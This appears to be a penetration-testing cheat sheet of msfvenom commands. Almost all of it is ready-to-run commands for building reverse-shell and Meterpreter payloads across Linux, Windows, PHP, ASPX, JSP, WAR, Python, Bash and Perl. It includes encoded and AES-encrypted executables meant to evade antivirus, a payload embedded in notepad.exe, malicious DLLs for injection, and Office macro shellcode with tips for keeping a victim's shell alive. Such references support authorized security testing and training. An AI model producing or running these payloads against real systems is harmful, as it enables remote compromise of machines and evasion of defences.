Msfvenom Payloads
msfvenom --list payloads --> List available payloads
msfvenom --list encoders --> List available encoders
msfvenom --list encrypt --> List available encryptors
Linux
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP_ADDR ESS> LPORT=<PORT> -f elf reverse.elf --> Created Meterpreter reverse TCP payload for Linux systems
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 prependfork=true -f elf -t 300 -e x64/xor_dynamic -o payload.elf --> Xor Encrypted Shellcode Runner
msfvenom -a x64 -p linux/x64/shell_reverse_tcp LHOST=attacker_ip LPORT=port -f elf-so -o file_name --> Creates a malicious shared library object that establishes a remote shell to an attacker system.
msfvenom -p windows/x64/exec CMD=calc.exe -f c EXITFUNC=thread --> Could be used to test c payloads
msfvenom -p windows/x64/exec CMD=calc.exe -f raw EXITFUNC=thread -o payload.bin --> Could be used to test raw shellcode implants
Windows
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x86/shikata_ga_nai -i 3 -a x8 6 -f exe > encoded.exe --> Created encoded Meterpreter reverse TCP payload for Windows systems
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.176.134 LPORT=443 -e x64/zutto_dekiru -x /home/kali/notepad.exe -f exe -o met64_notepad.exe
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 --encrypt aes256 --encrypt-key fdgdgj93jf43uj983uf498f43 -f exe -o met64_aes.exe
msfvenom -p windows/x64/meterpreter/reverse_http LHOST=192.168.119.120 LPORT=443 -f csharp EXITFUNC=thread --> shellcode for csharp project
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f raw -o shell.txt --> Shellcode for sharpshotter
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f dll -o met.dll --> Malicioud DLL (DLL Injection)
- Shellcode for VBA Macros
To generate specific shellcode formatted as vbapplication with msfvenom (specify the EXITFUNC with a value of “thread” instead of the default value of “process” to avoid closing Microsoft Word when the shellcode exits):
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 EXITFUNC=thread -f vbapplication
To work as expected, this requires a matching 32-bit multi/handler in Metasploit with the EXITFUNC set to “thread” and matching IP and port number.The primary disadvantage is that when the victim closes Word, our shell will die, although Metasploit’s AutoMigrate module solves this.
To generate Powershell shellcode to insert in a VBA Macro:
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 EXITFUNC=thread -f ps1
With this version, our shell dies as soon as the parent PowerShell process terminates. Our shell is essentially being terminated before it even starts. To solve this, we must instruct PowerShell to delay termination until our shell fully executes. We’ll use the Win32 WaitSingleObject129 API to pause the script and allow Meterpreter to finish.
To solve this we can introduce this shellcode into a powershell script that runs it through the reflection techique (Powershell Reflection Shellcode Runner)
PHP
msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php
Then we need to add the <?php at the first line of the file so that it will execute as a PHP webpage
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASPX
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f aspx -o /home/kali/met.aspx
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
Python
msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<PORT> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<PORT> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<IP> LPORT=<PORT> -f raw > shell.pl
Last updated